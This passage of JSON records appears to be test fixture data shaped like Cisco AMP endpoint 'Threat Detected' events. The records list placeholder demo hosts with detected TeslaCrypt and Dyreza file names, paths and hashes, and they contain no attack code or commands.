Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":821000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261640","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261639","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261638","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":680000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261637","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":665000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261636","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":509000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261635","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259028591575000,"timestamp":1610705845,"timestamp_nanoseconds":984000000,"date":"2021-01-15T10:17:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259028591575130","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251439135752000,"timestamp":1610705841,"timestamp_nanoseconds":455000000,"date":"2021-01-15T10:17:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251439135752194","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258981346935000,"timestamp":1610705834,"timestamp_nanoseconds":346000000,"date":"2021-01-15T10:17:14+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258981346934873","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258929807327000,"timestamp":1610705822,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:02+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258929807327320","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":470000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542427","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":112000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":71000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542425","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":532000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":454000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667841684537366","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":80000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537365","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258118058508000,"timestamp":1610705633,"timestamp_nanoseconds":636000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258118058508361","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667837389570000,"timestamp":1610705633,"timestamp_nanoseconds":689000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667837389570068","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258066518901000,"timestamp":1610705621,"timestamp_nanoseconds":608000000,"date":"2021-01-15T10:13:41+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258066518900808","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258014979293000,"timestamp":1610705609,"timestamp_nanoseconds":581000000,"date":"2021-01-15T10:13:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258014979293255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257963439686000,"timestamp":1610705597,"timestamp_nanoseconds":569000000,"date":"2021-01-15T10:13:17+00:00","event_type":"Threat 